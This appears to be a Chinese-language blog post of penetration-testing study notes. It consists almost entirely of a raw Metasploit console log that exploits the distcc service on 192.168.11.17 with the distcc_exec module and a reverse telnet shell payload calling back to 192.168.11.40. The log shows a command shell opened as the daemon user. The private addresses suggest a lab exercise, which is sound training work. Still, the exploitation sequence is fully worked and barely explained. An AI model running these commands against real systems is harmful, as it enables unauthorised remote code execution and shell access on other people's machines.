渗透杂记2013-07-31
2013-07-31 15:03
204 查看
上个礼拜去旅游,累出翔来了,真想不明白为什么那么多人花钱去买罪受。今天更新一篇,最近在做51的视频教程,旅游回来一直没缓过来劲,这算是学习笔记吧。
本文出自 “文东会” 博客,转载请与作者联系!
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux System information as of Wed Jul 31 14:55:12 CST 2013 System load: 0.31 Processes: 149 Usage of /: 72.0% of 19.06GB Users logged in: 1 Memory usage: 25% IP address for eth0: 192.168.11.40 Swap usage: 3% => There is 1 zombie process. Graph this data and manage this system at https://landscape.canonical.com/ Last login: Wed Jul 31 14:31:36 2013 from 192.168.11.5 root@bt:~# root@bt:~# root@bt:~# msfpro [*] Starting Metasploit Console... _---------. .' ####### ;." .---,. ;@ @@`; .---,.. ." @@@@@'.,'@@ @@@@@',.'@@@@ ". '-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @; `.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .' "--'.@@@ -.@ @ ,'- .'--" ".@' ; @ @ `. ;' |@@@@ @@@ @ . ' @@@ @@ @@ , `.@@@@ @@ . ',@@ @ ; _____________ ( 3 C ) /|___ / Metasploit! \ ;@'. __*__,." \|--- \_____________/ '(.,...."/ =[ metasploit v4.6.2-1 [core:4.6 api:1.0] + -- --=[ 1138 exploits - 718 auxiliary - 194 post + -- --=[ 309 payloads - 30 encoders - 8 nops [*] Successfully loaded plugin: pro msf > use exploit/unix/misc/distcc_exec msf exploit(distcc_exec) > show payloads Compatible Payloads =================== Name Disclosure Date Rank Description ---- --------------- ---- ----------- cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl) cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6 cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby) cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6 cmd/unix/generic normal Unix Command, Generic Command Execution cmd/unix/reverse normal Unix Command Shell, Double reverse TCP (telnet) cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl) cmd/unix/reverse_perl_ssl normal Unix Command Shell, Reverse TCP SSL (via perl) cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby) cmd/unix/reverse_ruby_ssl normal Unix Command Shell, Reverse TCP SSL (via Ruby) cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet) msf exploit(distcc_exec) > set PAYLOAD cmd/unix/reverse PAYLOAD => cmd/unix/reverse msf exploit(distcc_exec) > show options Module options (exploit/unix/misc/distcc_exec): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 3632 yes The target port Payload options (cmd/unix/reverse): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Target msf exploit(distcc_exec) > set RHOST 192.168.11.17 RHOST => 192.168.11.17 msf exploit(distcc_exec) > set LHOST 192.168.11.40 LHOST => 192.168.11.40 msf exploit(distcc_exec) > exploit [*] Started reverse double handler [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo ruCpcMy2m0BrAfbq; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "ruCpcMy2m0BrAfbq\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (192.168.11.40:4444 -> 192.168.11.17:58472) at 2013-07-31 14:59:21 +0800 id uid=1(daemon) gid=1(daemon) groups=1(daemon) whoami daemon cd / ls bin boot cdrom dev etc home initrd initrd.img lib lost+found media mnt nohup.out opt proc root sbin srv sys tmp usr var vmlinuz
本文出自 “文东会” 博客,转载请与作者联系!
相关文章推荐
- 渗透杂记-2013-07-10
- 渗透杂记-2013-07-21
- 渗透杂记-2013-07-12
- 渗透杂记-2013-07-13
- 渗透杂记-2013-07-13
- 渗透杂记-2013-07-13
- 渗透杂记-2013-07-13
- 渗透杂记2015-01-21
- 安卓杂记(三)利用自定义的PolyBezier()函数将一系列散点绘制成光滑曲线(一)
- websploit全自动渗透攻击
- 内网渗透思路
- 杂记1:不安装Oracle客户端远程连接Oracle的方法
- Oracle 技术杂记
- [C++杂记] char *str会默认为const char *str
- 编绎openssl杂记(window)
- 渗透测试:反弹与转发小结
- linux 杂记
- 渗透测试之IP和域名信息搜集验证
- spark:学习杂记+仿写案例--28